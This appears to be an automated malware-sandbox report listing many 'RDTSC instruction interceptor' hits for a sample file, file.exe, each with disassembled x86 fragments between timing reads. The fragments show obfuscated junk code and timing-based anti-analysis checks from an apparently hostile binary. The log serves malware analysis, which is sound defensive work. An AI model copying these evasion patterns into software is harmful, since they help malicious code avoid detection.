                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B49A second address: D1B4D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007F6969412EA6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d call 00007F6969412EADh 0x00000012 xor cx, BEC6h 0x00000017 pop edi 0x00000018 lea ebx, dword ptr [ebp+1246025Ch] 0x0000001e mov edx, dword ptr [ebp+122D2CE3h] 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F6969412EADh 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B594 second address: D1B5AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6968D54738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F6968D5473Ch 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B5AF second address: D1B5B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6969412EA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B5B9 second address: D1B649 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6968D54736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D2F3Bh] 0x00000013 mov dword ptr [ebp+122D30EAh], esi 0x00000019 push 00000000h 0x0000001b adc di, 81FBh 0x00000020 mov dword ptr [ebp+122D31B5h], eax 0x00000026 push 75611D31h 0x0000002b push ecx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f jno 00007F6968D54736h 0x00000035 popad 0x00000036 pop ecx 0x00000037 xor dword ptr [esp], 75611DB1h 0x0000003e mov edx, dword ptr [ebp+122D2DD3h] 0x00000044 push 00000003h 0x00000046 push 00000000h 0x00000048 mov esi, eax 0x0000004a push 00000003h 0x0000004c mov edi, dword ptr [ebp+122D2F67h] 0x00000052 call 00007F6968D54739h 0x00000057 je 00007F6968D5474Eh 0x0000005d jng 00007F6968D54748h 0x00000063 jmp 00007F6968D54742h 0x00000068 push eax 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F6968D54743h 0x00000071 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B649 second address: D1B666 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F6969412EA6h 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B666 second address: D1B66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B66C second address: D1B69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6969412EB5h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6969412EB1h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B69E second address: D1B6A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B6A4 second address: D1B6AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6969412EA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B6AE second address: D1B6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B791 second address: D1B796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B796 second address: D1B7E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6968D54749h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jo 00007F6968D5474Eh 0x00000014 push ebx 0x00000015 jmp 00007F6968D54746h 0x0000001a pop ebx 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jp 00007F6968D5473Ch 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B7E8 second address: D1B82A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6969412EBFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007F6969412EB9h 0x00000014 pop esi 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B8D7 second address: D1B8DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B8DC second address: D1B917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1B0E06AAh 0x00000010 mov ecx, ebx 0x00000012 lea ebx, dword ptr [ebp+12460270h] 0x00000018 push esi 0x00000019 movzx edx, bx 0x0000001c pop esi 0x0000001d xchg eax, ebx 0x0000001e push esi 0x0000001f jl 00007F6969412EACh 0x00000025 pop esi 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jbe 00007F6969412EACh 0x0000002f jl 00007F6969412EA6h 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C54F second address: D2C558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C558 second address: D2C55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C55C second address: D2C575 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F6968D5473Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C56A second address: D3C57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jp 00007F6969412EA6h 0x0000000c jp 00007F6969412EA6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C57F second address: D3C587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C587 second address: D3C59C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F6969412EA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C59C second address: D3C5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFCA68 second address: CFCA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A447 second address: D3A44B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A58C second address: D3A590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A590 second address: D3A59D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A59D second address: D3A5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A7F4 second address: D3A819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 jnp 00007F6968D54736h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F6968D5473Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A819 second address: D3A837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6969412EB8h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A976 second address: D3A99A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F6968D54748h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A99A second address: D3A9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6969412EA6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6969412EABh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A9B7 second address: D3A9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A9BC second address: D3A9D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB4h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3ADD3 second address: D3ADD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3ADD7 second address: D3ADDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3ADDD second address: D3ADF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F6968D54742h 0x0000000c jl 00007F6968D54736h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3ADF1 second address: D3ADF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B240 second address: D3B262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6968D54736h 0x0000000a popad 0x0000000b jmp 00007F6968D5473Fh 0x00000010 jc 00007F6968D54742h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B3F2 second address: D3B3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F6969412EA6h 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B5C0 second address: D3B5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6968D54742h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32548 second address: D32568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EB6h 0x00000009 jc 00007F6969412EA6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32568 second address: D3256C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3256C second address: D32572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C0F2 second address: D3C0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C0F8 second address: D3C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C0FC second address: D3C105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C105 second address: D3C13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6969412EAEh 0x00000009 pop edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F6969412EB2h 0x00000013 jmp 00007F6969412EAEh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DB4E second address: D3DB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6968D54736h 0x0000000a jmp 00007F6968D5473Bh 0x0000000f popad 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 jng 00007F6968D54742h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DB74 second address: D3DB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9547 second address: CF954D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D420B9 second address: D420BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D433D6 second address: D433DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06EFB second address: D06F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06F03 second address: D06F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d jno 00007F6968D5473Eh 0x00000013 push esi 0x00000014 jg 00007F6968D54736h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48D91 second address: D48DA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edi 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48DA1 second address: D48DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48DA7 second address: D48DE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB6h 0x00000007 jg 00007F6969412EA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F6969412EB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48DE0 second address: D48DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49096 second address: D490B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jns 00007F6969412EAAh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F6969412EA6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49E7B second address: D49E93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6968D5473Fh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49E93 second address: D49EB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6969412EB4h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49EB6 second address: D49EDB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jng 00007F6968D5473Eh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007F6968D54738h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49EDB second address: D49F34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F6969412EA8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push EACE04C4h 0x00000029 pushad 0x0000002a jmp 00007F6969412EB1h 0x0000002f pushad 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A634 second address: D4A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A638 second address: D4A650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jc 00007F6969412EA6h 0x00000011 jng 00007F6969412EA6h 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ABDA second address: D4ABE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ABE1 second address: D4ABEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ABEE second address: D4ABF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ABF2 second address: D4AC37 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F6969412EA8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jp 00007F6969412EACh 0x0000002c mov esi, dword ptr [ebp+122D3C94h] 0x00000032 push eax 0x00000033 pushad 0x00000034 jo 00007F6969412EACh 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4AC37 second address: D4AC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F6968D54745h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B058 second address: D4B05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B151 second address: D4B16D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54748h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B16D second address: D4B18E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F6969412EB5h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B220 second address: D4B225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B765 second address: D4B76A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B76A second address: D4B770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B770 second address: D4B774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B774 second address: D4B7B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 and edi, dword ptr [ebp+122D2ECBh] 0x0000000f call 00007F6968D5473Ch 0x00000014 add dword ptr [ebp+122D1E21h], edx 0x0000001a pop esi 0x0000001b push 00000000h 0x0000001d mov edi, dword ptr [ebp+122D2C93h] 0x00000023 sub dword ptr [ebp+122D3845h], eax 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D3D45h], ebx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 pop eax 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B7B3 second address: D4B7B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4C1BF second address: D4C1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BFAF second address: D4BFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F6969412EA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4DC34 second address: D4DC90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6968D54738h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 xor edi, dword ptr [ebp+122D30FEh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F6968D54738h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D2433h] 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d pushad 0x0000003e jmp 00007F6968D54747h 0x00000043 push esi 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4C94B second address: D4C95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6969412EA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F6969412EA6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4C95E second address: D4C962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
